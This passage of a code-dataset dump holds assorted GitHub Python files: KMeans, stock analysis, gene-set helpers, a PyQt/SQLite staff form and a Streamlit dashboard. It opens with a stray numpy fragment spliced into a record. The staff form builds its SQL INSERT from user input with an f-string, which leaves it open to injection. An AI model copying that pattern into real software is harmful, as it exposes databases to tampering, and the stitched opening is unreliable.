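r = np.linspace(1.0, 3.0, 21)
theta = np.linspace(0.0, 2.0 * np.pi, 60, endpoint=False)
R, T = np.meshgrid(r, theta, indexing='ij')
X = R * np.cos(T)

# derivative along axis 0 (r) and axis 1 (theta): central differences in the
# interior, one-sided at the edges, matching the explicit loops above
dXdr, dXdtheta = np.gradient(X, r, theta)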
\nsign = '(\\\\+|-)?'\nhexa = f'({hex_digit})+' \nhex_floating_point = f'^(0x|0X)({hexa}|{hexa}.{hexa}|.{hexa})({exp})({sign})({dec_digit}+)({suff})$'\n\nreg = re.compile(hex_floating_point)\n\nfilepath = sys.argv[1]\n\nfp = open(filepath)\n#print (f'Regular expression for a hexadecimal floating point: {hex_floating_point}')\nfor line in fp.readlines():\n line = line.strip()\n print(f'{\"Matched:\" if reg.search(line) else \"Not Matched:\"} {line}')","repo_name":"tainagdcoleman/cecs524","sub_path":"Assignment 3/Assn3.py","file_name":"Assn3.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69951816514","text":"\"\"\"Contens URLs.\"\"\"\n\n# Django\nfrom django.urls import path\n\n# Views\nfrom .views import contents\n\nurlpatterns = [\n path(\n route='ver//',\n view=contents.ContentDetailView.as_view(),\n name='detail'\n ),\n path(\n route='send/',\n view=contents.SendExampleURL.as_view(),\n name='send'\n )\n]\n","repo_name":"aleducode/hacku_backend","sub_path":"hacku/contents/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"16623997215","text":"import math\nimport numpy as np\nfrom copy import copy\nimport random\n\n\nclass KMeans:\n @staticmethod\n def evclid_distance(a, b):\n distance = 0\n for i in range(len(a)):\n distance = distance + (b[i] - a[i]) ** 2\n return math.sqrt(distance)\n\n @staticmethod\n def sity_distance(a, b):\n distance = 0\n for i in range(len(a)):\n distance = distance + abs(b[i] - a[i])\n return math.sqrt(distance)\n\n @staticmethod\n def chees_distance(a, b):\n distance = []\n for i in range(len(a)):\n distance.append(abs(b[i] - a[i]))\n return max(distance)\n\n @staticmethod\n def get_center_of_mass(points, center_of_mass):\n if len(points) == 0:\n return center_of_mass\n np_array = []\n\n for p in points:\n np_array.append(np.array(p[1]))\n\n vec = sum(np_array) / len(points)\n\n return (-1, list(vec))\n\n @staticmethod\n def k_means(vectors, k, distance_method):\n def fan(points, center_of_mass):\n # расчитать кластеры\n clusters = [[]] * len(center_of_mass)\n for i in range(len(center_of_mass)):\n clusters[i] = []\n\n for p in points:\n dist = list(map(lambda x: distance_method(x[1], p[1]), center_of_mass))\n c_n = dist.index(min(dist))\n clusters[c_n].append(p)\n\n # расчитать новые центры масс\n new_center_of_mass = []\n i = 0\n for c in clusters:\n new_center_of_mass.append(KMeans.get_center_of_mass(c, center_of_mass[i]))\n i+=1\n\n # cравнить цм\n if center_of_mass == new_center_of_mass:\n return clusters\n else:\n return fan(points, new_center_of_mass)\n\n c_o_m = random.sample(vectors, k)\n return fan(vectors, c_o_m)","repo_name":"agreenwalrus/ImageProcessing","sub_path":"Im/KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24080373184","text":"# Write a function to find all pairs of an integer array whose sum is equal to a given number. 
Do not consider commutative pairs.\r\n\r\ndef pairSum(array, value):\r\n newArray = []\r\n for i in range(len(array)):\r\n for j in range(i+1, len(array)):\r\n if array[i] + array[j] == value:\r\n newArray.append(str(array[i]) + \"+\" + str(array[j]))\r\n return newArray\r\n\r\n\r\nprint(pairSum([2, 4, 3, 5, 6, -2, 4, 7, 8, 9],7))","repo_name":"shollet/Python-Exercises","sub_path":"1. ArraysLists/pairSum/pairSum.py","file_name":"pairSum.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34850003444","text":"\ndef eslintParser(fileName):\n\n\tfile = open(fileName,\"r\")\n\t#print(file.read())\n\n\n\tfor words in file:\n\t\tif(words[0] == \"🔥\"):\n\t\t\t#print(words)\n\t\t\tnumberOfProblems = words.split(\" \")[2]\n\t\t\tnumberOfErrors = words.split(\" \")[6].replace(\"(\",\"\")\n\t\t\tnumberOfWarnings = words.split(\" \")[8]\n\n\t\t\tproblemsList.append(numberOfProblems)\n\t\t\terrorsList.append(numberOfErrors)\n\t\t\twarningsList.append(numberOfWarnings)\n\t\t\tsuccessfulFileNames.append(fileName)\n\n\t\t\t#print(numberOfErrors)\n\t\t\tprint(words.split(\" \"))\n\tfile.close()\n\n\n\nfile2 = open(\"eslintDirs.txt\") #2790 - 2990\nfileList = [] \nfor packages in file2:\n\tfileList.append(packages)\n#each Packages had a '\\n' char attached\n#Remove the \"\\n\" character\ni = 0\nwhile(i < len(fileList)):\n\tif(\"\\n\" in fileList[i]):\n\t\tfileList[i] = fileList[i].replace(\"\\n\", \".txt\")\n\t\t#print(\"Has New line\")\n\ti = i + 1\n\nfile2.close()\n\n\n\n\n#Creating Global Lists\nproblemsList = []\nerrorsList = [] \nwarningsList = []\n\n\n\n\nsuccessfulFileNames = []\n\nprint(fileList)\n\n\n\n#____\ni = 0 \nwhile(i < len(fileList)):\n\teslintParser(fileList[i])\n\ti = i + 1\n\n\n\n#### UNcomment to see them parsed\n# print(successfulFileNames)\n# print(problemsList)\n# print(errorsList)\n# print(warningsList)\n\nprint(\"Number of successfulFileNames\", len(successfulFileNames))\nprint(\"Number of Problems \", len(problemsList))\nprint(\"Number of Errors \", len(errorsList))\nprint(\"NumberOFwarnings \", len(warningsList))\n\n\n","repo_name":"atearjen/eslint_analysis","sub_path":"eslintParser.py","file_name":"eslintParser.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43889732180","text":"#Evan Pomeroy 6/3/2022\r\n\r\nimport matplotlib.pyplot as plt\r\nimport datetime as dt\r\n\r\ndef totalL():\r\n \"\"\"\r\n Creates list of data for every day the stock is traded\r\n \r\n Asks for file then iterates through line to create list of lines from csv\r\n \r\n Parameters:\r\n none\r\n \r\n Input:\r\n File name\r\n \r\n Returns:\r\n List of stock info by day\r\n \r\n \"\"\"\r\n x=True\r\n while x:\r\n try:\r\n stock = open(input(\"Enter file name (hint:'UA-2021.csv'): \"), \"r\")\r\n x=False\r\n except:\r\n #make sure right file\r\n print(\"Error: File not found\\tHint: Try 'UA-2021.csv'\")\r\n LL = []\r\n ct = 0\r\n for line in stock:\r\n if ct ==0:\r\n ct =1\r\n else:\r\n d = line.split(\",\")\r\n LL.append(d)\r\n stock.seek(0,0)\r\n return LL\r\n\r\n\r\ndef datesL(listall):\r\n \"\"\"\r\n Creates a list of dates stock was traded from list of trading day info\r\n \r\n Parameters:\r\n List of info from trading day\r\n \r\n Returns:\r\n List of dates\r\n \r\n \"\"\"\r\n dates = []\r\n for i in listall:\r\n dates.append(i[0])\r\n return dates\r\n\r\ndef openL(listall):\r\n \"\"\"\r\n 
Creates a list of open prices when stock was traded\r\n \r\n Parameters:\r\n List of info from trading day\r\n \r\n Returns:\r\n List opening prices\r\n \r\n \"\"\"\r\n opens = []\r\n for i in listall:\r\n o = i[1]\r\n o2 = o.replace('\"','')\r\n opens.append(float(o2))\r\n return opens\r\n\r\ndef closeL(listall):\r\n \"\"\"\r\n Creates a list of closing prices when stock was traded\r\n \r\n Parameters:\r\n List of info from trading day\r\n \r\n Returns:\r\n List closing prices\r\n \r\n \"\"\"\r\n closes = []\r\n for i in listall:\r\n c = i[4]\r\n c2 = c.replace('\"','')\r\n closes.append(float(c2))\r\n return closes\r\n\r\ndef high_close(close, date):\r\n \"\"\"\r\n Finds max stock price at closing from the year\r\n \r\n uses similar indexes to find date from a maximum close price index\r\n \r\n Parameters:\r\n List of dates\r\n List of closing prices\r\n \r\n Returns:\r\n none\r\n \r\n Prints:\r\n String with max price and date\r\n \r\n \"\"\"\r\n maxc = 0\r\n index = 0\r\n dref = 0\r\n for i in close:\r\n if i > maxc:\r\n maxc = i\r\n dref = index\r\n index += 1\r\n print(f'The highest closing price was ${maxc} on {date[dref]}')\r\n\r\ndef low_open(openp, date):\r\n \"\"\"\r\n Finds min stock price at open from the year\r\n \r\n uses similar indexes to find date from a min open price index\r\n \r\n Parameters:\r\n List of dates\r\n List of opening prices\r\n \r\n Returns:\r\n none\r\n \r\n Prints:\r\n String with min price and date\r\n \r\n \"\"\"\r\n mino = 999\r\n index = 0\r\n dref = 0\r\n for i in openp:\r\n if i < mino:\r\n mino = i\r\n dref = index\r\n index += 1\r\n print(f'The lowest opening price was ${mino} on {date[dref]}')\r\n\r\ndef high_close10(close, date):\r\n \"\"\"\r\n Finds 10 max stock price at closing from the year\r\n \r\n uses similar indexes to find date from a maximum close price index.\r\n Prices and dates are stored in a list then current max price and date are\r\n removed from list. It does this 9 more times to find the max 10 times.\r\n \r\n Parameters:\r\n List of dates\r\n List of closing prices\r\n \r\n Returns:\r\n none\r\n \r\n Prints:\r\n String with 10 max prices and dates\r\n \r\n \"\"\"\r\n high = []\r\n dateL = []\r\n for x in range(10):\r\n maxc = 0\r\n index = 0\r\n dref = 0\r\n for i in close:\r\n if i > maxc:\r\n maxc = i\r\n dref = index\r\n index += 1\r\n high.append(maxc)\r\n dateL.append(date[dref])\r\n close.pop(dref)\r\n date.pop(dref)\r\n print('10 Highest Closing Prices:\\n')\r\n for i in range(10):\r\n print(f'Price: ${high[i]}\\tDate: {dateL[i]}')\r\n \r\ndef low_open10(openL, date):\r\n \"\"\"\r\n Finds 10 min stock price at open from the year\r\n \r\n uses similar indexes to find date from a min close price index.\r\n Prices and dates are stored in a list then current min price and date are\r\n removed from list. 
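 (Removing entries mutates the close and date lists passed in, which is why main() rebuilds both lists for each call.)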
It does this 9 more times to find the min 10 times.\r\n \r\n Parameters:\r\n List of dates\r\n List of opening prices\r\n \r\n Returns:\r\n none\r\n \r\n Prints:\r\n String with 10 min prices and dates\r\n \r\n \"\"\"\r\n low = []\r\n dateL = []\r\n for x in range(10):\r\n mino = 999\r\n index = 0\r\n dref = 0\r\n for i in openL:\r\n if i < mino:\r\n mino = i\r\n dref = index\r\n index += 1\r\n low.append(mino)\r\n dateL.append(date[dref])\r\n openL.pop(dref)\r\n date.pop(dref)\r\n print('10 Lowest Opening Prices:\\n')\r\n for i in range(10):\r\n print(f'Price: ${low[i]} \\tDate: {dateL[i]}')\r\n \r\n\r\ndef openchart(openL, date):\r\n \"\"\"\r\n Creates graph of average opening price by month\r\n \r\n When the first 2 characters (month) match the iterator date, the price is \r\n added to a temporary total to find the average. The average is added to\r\n a list and this happend 12 times (12 months). The numbers are put into a\r\n pyplot and x axis is substituted for strings of months.\r\n \r\n Parameters:\r\n List of dates\r\n List of opening prices\r\n \r\n Returns:\r\n none\r\n \r\n Prints:\r\n Confirmation of graph creation\r\n \r\n Produces:\r\n png file of graph\r\n \r\n \"\"\"\r\n mlist = ['Jan', 'Feb', 'March', 'April', 'May', 'June', 'July', 'Aug','Sep','Oct','Nov','Dec']\r\n avgo = []\r\n month = []\r\n #range of months\r\n for i in range(1,13):\r\n Ltot = 0\r\n ct = 0\r\n for x in range(len(date)):\r\n #test if date matches current iteration date\r\n if int(date[x][0:2]) == i:\r\n Ltot += openL[x]\r\n ct+=1\r\n avgo.append(round(Ltot/ct,2))\r\n month.append(i)\r\n plt.xticks(month, mlist)\r\n plt.plot(month, avgo)\r\n plt.ylabel('Stock Price ($)')\r\n plt.title(\"Average Opening Price by Month\")\r\n plt.savefig('Open Price by Month.png')\r\n plt.show()\r\n print(\"Graph saved as 'Open Price by Month.png'\")\r\n \r\n\r\n \r\ndef closechart(close, date):\r\n \"\"\"\r\n Creates graph of average close price by month\r\n \r\n When the first 2 characters (month) match the iterator date, the price is \r\n added to a temporary total to find the average. The average is added to\r\n a list and this happend 12 times (12 months). 
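 (Dates are assumed to begin with a two-digit month, e.g. MM/DD/YYYY, so int(date[x][0:2]) picks out the month to match.)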
The numbers are put into a\r\n pyplot and x axis is substituted for strings of months.\r\n \r\n Parameters:\r\n List of dates\r\n List of closing prices\r\n \r\n Returns:\r\n none\r\n \r\n Prints:\r\n Confirmation of graph creation\r\n \r\n Produces:\r\n png file of graph\r\n \r\n \"\"\"\r\n mlist = ['Jan', 'Feb', 'March', 'April', 'May', 'June', 'July', 'Aug','Sep','Oct','Nov','Dec']\r\n avgo = []\r\n month = []\r\n for i in range(1,13):\r\n Ltot = 0\r\n ct = 0\r\n for x in range(len(date)):\r\n if int(date[x][0:2]) == i:\r\n Ltot += close[x]\r\n ct+=1\r\n avgo.append(round(Ltot/ct,2))\r\n month.append(i)\r\n plt.xticks(month, mlist)\r\n plt.plot(month, avgo)\r\n plt.ylabel('Stock Price ($)')\r\n plt.title(\"Average Closing Price by Month\")\r\n plt.savefig(\"Close Price by Month.png\")\r\n plt.show()\r\n print(\"Graph saved as 'Close Price by Month.png'\")\r\n\r\ndef main():\r\n try:\r\n file = totalL()\r\n print(\"\\n\")\r\n high_close(closeL(file),datesL(file))\r\n print(\"\\n\")\r\n low_open(openL(file),datesL(file))\r\n print(\"\\n\")\r\n high_close10(closeL(file),datesL(file))\r\n print(\"\\n\")\r\n low_open10(openL(file),datesL(file))\r\n print(\"\\n\")\r\n openchart(openL(file),datesL(file))\r\n print(\"\\n\")\r\n closechart(closeL(file),datesL(file))\r\n except:\r\n print(\"Error!\\tMake sure to use the file submitted through canvas (UA-2021.csv\")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n \r\n\r\n\r\n#I worked very hard on this","repo_name":"ejpomero/Stock-Analysis","sub_path":"Stock Analysis.py","file_name":"Stock Analysis.py","file_ext":"py","file_size_in_byte":8302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44906065287","text":"from .bigru import build_bigru\nfrom .fc import build_fc\nfrom .lstm import build_lstm\nfrom .m_resnet import build_m_resnet\nfrom .resnet import build_resnet\n\n\ndef build_img_model(cfg):\n if cfg.MODEL.IMG_MODEL in [\"resnet18\", \"resnet50\", \"resnet101\"]:\n model = build_resnet(cfg)\n elif cfg.MODEL.IMG_MODEL in [\"m_resnet50\", \"m_resnet101\"]:\n model = build_m_resnet(cfg)\n # elif cfg.MODEL.IMG_MODEL == \"diva\":\n # model = build_diva(cfg)\n else:\n raise NotImplementedError\n return model\n\n\ndef build_text_model(cfg):\n if cfg.MODEL.TEXT_MODEL == \"bigru\":\n model = build_bigru(cfg)\n elif cfg.MODEL.TEXT_MODEL == \"lstm\":\n model = build_lstm(cfg)\n # elif cfg.MODEL.TEXT_MODEL == \"bert\":\n # model = build_bert(cfg)\n elif cfg.MODEL.TEXT_MODEL == \"fc\":\n model = build_fc(cfg)\n else:\n raise NotImplementedError\n return model\n","repo_name":"BrandonHanx/CompFashion","sub_path":"lib/models/backbones/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"41268604243","text":"#gene_set_handling.py 20.11.03\n\n\ndef deg_file_to_dict_and_list(deg_file, delimiter, abs_log2_threshold, padj_threshold):\n#Requirements before entering this function\n#DESeq2 outputs\n#Currently \"Specified\" to handle Vasculitis project\n\n\tprint (\"Info :: abs log2 threshold > %s\" % abs_log2_threshold)\n\tprint (\"Info :: adj p-value threshold > %s\" % padj_threshold)\n\n\tdeg_dict = {}\n\tdeg_list = []\n\n\tdeg_df = pd.read_csv(deg_file, sep = delimiter, header=0)\n\tr, c = deg_df.shape\n\n\tfor i in range(r):\n\t\tgene = deg_df.iloc[i][0]\n\t\tlog2fc = float(deg_df.iloc[i][2])\n\t\tabs_log2fc = float(abs(deg_df.iloc[i][2]))\n\t\tpadj = 
float(deg_df.iloc[i][6])\n\n\t\tif abs_log2fc > float(abs_log2_threshold):\n\t\t\tif padj < float(padj_threshold):\n\t\t\t\tdeg_dict[gene] = [log2fc, padj]\n\t\t\t\tdeg_list.append(gene)\n\n\tprint (\"Info :: Total Number of DEGS > %s \" % len(deg_list))\n\n\tdeg_list = list(deg_list)\n\n\treturn deg_dict, deg_list\n\ndef gene_dict_to_output(deg_dict, output_file):\n\n\toutput_txt = open(output_file,'w')\n\toutput_txt.write(\"gene\\tlog2fc\\tpadj\\n\")\n\n\tfor gene in list(deg_dict.keys()):\n\n\t\tlog2fc = deg_dict[gene][0]\n\t\tpadj = deg_dict[gene][1]\n\n\t\toutput_txt.write(\"%s\\t%s\\t%s\\n\" % (gene, log2fc, padj))\n\n\toutput_txt.close()\n\ndef gene_file_to_gene_list(input_file, delimiter, focus_column):\n#intentioned to...\n#Requirements: convert_genesymbol_to_entrezid.R\n#Preprocess for function > api_geneset_enrichment\n\t\n\tinput_df = pd.read_csv(input_file, sep = delimiter, header=None, dtype=str)\n\tgene_list = input_df.iloc[:,focus_column]\n\tgene_list = list(gene_list)\n\n\treturn gene_list\n\ndef sample_class_information_to_dict(input_file, delimiter):\n\n\tinput_df = pd.read_csv(input_file, sep = delimiter, header=None, dtype=str)\n\tr, c = input_df.shape\n\tprint (input_df)\n\tprint (r,c)\n\tsample_dict = {}\n\n\tfor i in range(r):\n\t\tsampleID = input_df.iloc[i,0]\n\t\tsample_class = input_df.iloc[i,1]\n\t\tsample_dict[sampleID] = sample_class\n\n\treturn sample_dict\n\n\ndef gene_file_to_gene_dict_and_list(input_file, delimiter, focus_column):\n#intentioned to...\n#Requirements: convert_genesymbol_to_entrezid.R\n#Preprocess for function > api_geneset_enrichment\n\t\n\tinput_df = pd.read_csv(input_file, sep = delimiter, header=0, dtype=str)\n\tgene_list = list(input_df.iloc[:,focus_column])\n\tgene_dict = {}\n\tr, c = input_df.shape\n\n\tfor i in range(r):\n\t\tgene = input_df.iloc[i][0]\n\t\tfc = input_df.iloc[i][1]\n\t\tgene_dict[gene] = fc\n\n\treturn gene_list, gene_dict\n\ndef sample_metafile_to_info_dict(input_file, delimiter):\n\n\tinput_df = pd.read_csv(input_file, sep = delimiter, header=0, dtype=str)\n\tr, c = input_df.shape\n\n\tkfold_sample_dict = {}\n\tsample_class_dict = {}\n\n\tfor i in range(r):\n\t\t\n\t\tsampleID = input_df.iloc[i][0]\n\t\tkfold = input_df.iloc[i][4]\n\n\t\tif input_df.iloc[i][1] == \"case\":\n\t\t\tsample_class = 1\n\t\tif input_df.iloc[i][1] == \"control\":\n\t\t\tsample_class = 0\n\t\t\n\t\tsample_class_dict[sampleID] = sample_class\n\t\t\n\t\ttry: kfold_sample_dict[kfold].append(sampleID)\n\t\texcept KeyError: kfold_sample_dict[kfold] = [sampleID]\n\n\treturn kfold_sample_dict, sample_class_dict\n\ndef sample_metafile_to_info_dict_v2(input_file, delimiter):\n\n\tinput_df = pd.read_csv(input_file, sep = delimiter, header=0, dtype=str)\n\tr, c = input_df.shape\n\n\tkfold_sample_dict = {}\n\tsample_class_dict = {}\n\n\tfor i in range(r):\n\t\t\n\t\tsampleID = input_df.iloc[i][0]\n\t\tkfold = input_df.iloc[i][5]\n\n\t\tif input_df.iloc[i][1] == \"case\" or int(input_df.iloc[i][1]) == 1:\n\t\t\tsample_class = 1\n\t\tif input_df.iloc[i][1] == \"control\" or int(input_df.iloc[i][1]) == 0:\n\t\t\tsample_class = 0\n\t\t\n\t\tsample_class_dict[sampleID] = sample_class\n\t\t\n\t\ttry: kfold_sample_dict[kfold].append(sampleID)\n\t\texcept KeyError: kfold_sample_dict[kfold] = [sampleID]\n\n\treturn kfold_sample_dict, sample_class_dict\n\n\n\n\ndef api_geneset_enrichment(gene_list, annot_type):\n#Note: specific options are fixed\n\n\tbase_url = \"http://david.abcc.ncifcrf.gov/api.jsp?\"\n\tgene_symbol = \"type=ENTREZ_GENE_ID&ids=\"\n\ttool = 
\"&tool=term2term\"\n\n\tif annot_type == \"goterm\":\n\t\tannot = \"&annot=GOTERM_BP_FAT,GOTERM_CC_FAT,GOTERM_MF_FAT\"\n\tif annot_type == \"pathway\":\n\t\tannot = \"&annot=BIOCARTA,KEGG_PATHWAY\"\n\tif annot_type == \"disease\":\n\t\tannot = \"&annot=GENETIC_ASSOCIATION_DB_DISEASE,OMIM_DISEASE\"\n\n\tgene_list_str = \"\"\n\tgene_list_str += gene_list[0]\n\tfor i in range(1, len(gene_list)):\n\t\tgene = gene_list[i]\n\t\tgene_list_str += \",%s\" % gene\n\t\t\n\tapi_str = base_url + gene_symbol + gene_list_str + tool + annot\n\n\treturn api_str\n\n\nif __name__ == \"__main__\":\n print ('This is not meant to be run')\nelse:\n import pandas as pd\n print (\"LOADING :: gene_set_handling\")\n","repo_name":"jaeyunsung/Aortitis_2022","sub_path":"src/main/gene_set_handling.py","file_name":"gene_set_handling.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4155591539","text":"import sys\nimport sqlite3\n\nfrom PyQt5.QtWidgets import QApplication, QWidget, QTableWidgetItem\nfrom form_staff import Ui_Form\n\nSTAFF_POSTS = ['бухгалтер', 'менеджер', 'программист']\n\nclass MyWidget(QWidget, Ui_Form):\n def __init__(self):\n super(MyWidget, self).__init__()\n self.setupUi(self)\n self.cbPost.addItems(STAFF_POSTS)\n self.pbOpen.clicked.connect(self.open)\n self.pbInsert.clicked.connect(self.insert)\n\n def open(self):\n #try:\n self.conn = sqlite3.connect('basepomain')\n cur = self.conn.cursor()\n data = cur.execute(\"select * from staff\")\n col_name = [i[0] for i in data.description]\n data_rows = data.fetchall()\n #except Exception as e:\n # print(\"Ошибка с подключением к базе данных\")\n # return e\n self.twStaffs.setColumnCount(len(col_name))\n self.twStaffs.setHorizontalHeaderLabels(col_name)\n self.twStaffs.setRowCount(0)\n for i, row in enumerate(data_rows):\n self.twStaffs.setRowCount(self.twStaffs.rowCount()+1)\n for j, elem in enumerate(row):\n self.twStaffs.setItem(i, j, QTableWidgetItem(str(elem)))\n self.twStaffs.resizeColumnsToContents()\n\n def update_twStaffs(self, query=\"select * from staff\"):\n try:\n cur = self.conn.cursor()\n data = cur.execute(query).fetchall()\n except Exception as e:\n print(f\"Проблемы с подключением к БД. 
{e}\")\n return e\n self.twStaffs.setRowCount(0)\n for i, row in enumerate(data):\n self.twStaffs.setRowCount(self.twStaffs.rowCount() +1)\n for j, elem in enumerate(row):\n self.twStaffs.setItem(i, j, QTableWidgetItem(str(elem)))\n self.twStaffs.resizeColumnsToContents()\n\n def insert(self):\n row = [self.leFio.text(), 'муж' if self.rbMale.isChecked() else 'жен', self.spAge.text(),\n self.lePhone.text(), self.leEmail.text(), self.cbPost.itemText(self.cbPost.currentIndex()),\n self.spExp.text()]\n try:\n cur = self.conn.cursor()\n cur.execute(f\"\"\"insert into staff (fio, sex, age, phone, email, position, exp)\n values('{row[0]}', '{row[1]}', {row[2]},'{row[3]}','{row[4]}', '{row[5]}', {row[6]})\"\"\")\n self.conn.commit()\n cur.close()\n except Exception as e:\n print(\"Не смогли добавить запись.\")\n return e\n self.update_twStaffs()\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MyWidget()\n ex.show()\n sys.exit(app.exec_())","repo_name":"walravn5/Data-Base","sub_path":"DemoEz/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24515959497","text":"import pandas as pd # pip install pandas openpyxl\nimport plotly.express as px # pip install plotly-express\nimport streamlit as st # pip install streamlit\nimport numpy as np\nfrom streamlit_echarts import st_echarts\nimport pydeck as pdk\nfrom bokeh.plotting import figure\nimport matplotlib.pyplot as plt\n\nst.set_page_config(page_title=\"Sales Dashboard\", page_icon=\":bar_chart:\", layout=\"wide\")\n\n\n@st.cache_data\ndef get_data_from_excel():\n df = pd.read_excel(\n io=\"Ai_companies.xlsx\",\n engine=\"openpyxl\",\n sheet_name=\"sheet1\",\n # skiprows=3,\n usecols=\"A:J\",\n nrows=15,\n )\n return df\n\n\ndf = get_data_from_excel()\n# st.write(df)\nst.markdown(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True,\n)\npx.defaults.width = 1000\npx.defaults.height = 500\n\n\ndef bar_Reliance():\n reliance_data = df[df[\"Name\"] == \"Reliance Industries Ltd.\"]\n years = [2019, 2020, 2021, 2022, 2023]\n income_values = reliance_data.iloc[0, 3:8].tolist()\n X = years\n Y = income_values\n data = {\n \"Year\": X,\n \"Income (in CR)\": Y,\n }\n df2 = pd.DataFrame(data)\n\n # Create a Streamlit bar chart\n st.title(\"Reliance \")\n st.bar_chart(df2, use_container_width=True)\n\n\ncss = \"\"\"\n\n\"\"\"\nst.markdown(css, unsafe_allow_html=True)\ncss = \"\"\"\n\n\"\"\"\nst.markdown(css, unsafe_allow_html=True)\n\n\n# # Filter the data for \"Reliance Industries Ltd.\"\ndef covid():\n data = {\n \"Company Name\": [\n \"Tata Elxsi\",\n \"Kellton Tech Solutions Limited\",\n \"Happiest Minds Technologies Ltd.\",\n \"Zensar Technologies Ltd.\",\n \"Persistent Systems\",\n \"Saksoft\",\n \"Cyient\",\n \"Affle (India) Limited\",\n \"Haptik\",\n \"Flutura\",\n \"Niki.ai\",\n \"Reliance Industries Ltd.\",\n \"TVS Motor Company\",\n \"Tata Motors\",\n \"Indian Oil Corporation\",\n \"Mahindra & Mahindra\",\n \"Hindalco Industries\",\n \"Exide Industries Ltd\",\n \"Aether Industries\",\n \"Ola Electric\",\n \"Yulu\",\n \"EMotorad\",\n \"Wipro\",\n \"Tata Consultancy Services Ltd\",\n \"Mindtree\",\n \"Infosys Ltd\",\n \"Tech Mahindra\",\n \"Subex Ltd\",\n \"Zoho\",\n \"Razorpay Software Pvt Ltd\",\n ],\n \"Total_Income\": [\n 10648.47,\n 4137.5,\n 4694.7,\n 8089.69,\n 15240.63,\n 745.01,\n 9262.4,\n 1528.06,\n 353.67,\n 484.63,\n 15.2,\n 3272020,\n 115054,\n 1453594,\n 2825231,\n 471108,\n 804860,\n 57840.04,\n 
1265,\n 3074.72,\n 46.4,\n 252.49,\n 364947,\n 904305,\n 1516,\n 555228,\n 211991,\n 1738,\n 25346.05,\n 2330.2,\n ],\n }\n df = pd.DataFrame(data)\n\n # Create a line chart using st.line_chart\n st.line_chart(\n df.set_index(\"Company Name\")[\"Total_Income\"], use_container_width=True\n )\n\n # X = df.iloc[:,9:]\n\n # Y = df.iloc[:,-1]\n\n # p = figure(\n # title='Effect of Covid19 On Indian Startups',\n # x_axis_label='x',\n # y_axis_label='y')\n\n # # p.line(x, y, legend_label='Trend', line_width=2)\n\n # st.line_chart(df, x=X,y=Y, use_container_width=True)\n\n\n# Select the relevant columns for the last five years\n# reliance_data = reliance_data[['Income Year', 'Income of 5 Years']]\n\n# Create a Streamlit bar chart\n# st.bar_chart(reliance_data.set_index('Income Year'))\nst.header(\" :blue[DASHBOARD] :trophy:\")\nwith st.sidebar.header(\"Please Filter Here:\"):\n location = st.sidebar.multiselect(\n \"Select the Location:\",\n options=df[\"Location\"].unique(),\n default=df[\"Location\"].unique(),\n )\n custom_css = \"\"\"\n \n \"\"\"\n st.markdown(custom_css, unsafe_allow_html=True)\n head1, head2 = st.columns(2)\n with head1:\n q1 = st.button(\"TOP_COMPANY\", on_click=bar_Reliance, type=\"primary\")\n m1 = st.markdown(\n \"\"\"\n \"\"\",\n unsafe_allow_html=True,\n )\n with head2:\n q2 = st.button(\"COVID19_STATITICS\", on_click=covid, type=\"secondary\")\n m = st.markdown(\n \"\"\"\n \"\"\",\n unsafe_allow_html=True,\n )\n\n\nsector = st.sidebar.multiselect(\n \"Select the Sector Type:\",\n options=df[\"Sector\"].unique(),\n default=df[\"Sector\"].unique(),\n)\nuploaded_file = st.file_uploader(\"Choose a file\")\nif uploaded_file is not None:\n dd = pd.read_csv(uploaded_file, encoding=\"ISO-8859-1\")\n st.write(dd)\n # dd.to_csv(\"uploaded_file.csv\", index=False)\n dd[\"Date\"] = pd.to_datetime(dd[\"Date\"])\n dd.set_index(dd[\"Date\"], inplace=True)\n\n options = dd.columns.to_list()\n user_input = st.multiselect(\"Select an option: \", options)\n # st.write(\"You selected: \", user_input)\n if user_input:\n # plt.plot(dd[user_input[0]].head(100), dd[user_input[1]].head(100))\n plt.plot(dd.index.year, dd[user_input[0]])\n st.pyplot(plt)\ndf_selection = df.query(\"Location == @location & Sector == @sector\")\n\ntotal_revenue = int(df_selection[\"Total_Income\"].sum())\naverage_income_2023 = round(df_selection[\"Income in 2023(in CR)\"].mean(), 2)\ncolumn1, column2 = st.columns(2)\nwith column1:\n # st.subheader(\"total income\")\n st.subheader(f\":blue[Total_Income] {total_revenue} :red[CR]\")\nwith column2:\n st.subheader(f\":blue[Average Income In 2023:] {average_income_2023} :red[CR]\")\n# ---- MAINPAGE ----\nst.title(\":bar_chart: INCOME TRENDS\")\nst.markdown(\"##\")\n\n\ntab1, tab2, tab3, tab4, tab5 = st.tabs([\"2023\", \"2022\", \"2021\", \"2020\", \"2019\"])\nwith tab1:\n top_10_companies = df.sort_values(by=\"Income in 2023(in CR)\", ascending=False).head(\n 10\n )\n st.write(top_10_companies[[\"Name\", \"Income in 2023(in CR)\"]])\nwith tab2:\n top_10_companies = df.sort_values(by=\"Income in 2022(in CR)\", ascending=False).head(\n 10\n )\n st.write(top_10_companies[[\"Name\", \"Income in 2022(in CR)\"]])\nwith tab3:\n top_10_companies = df.sort_values(by=\"Income in 2021(in CR)\", ascending=False).head(\n 10\n 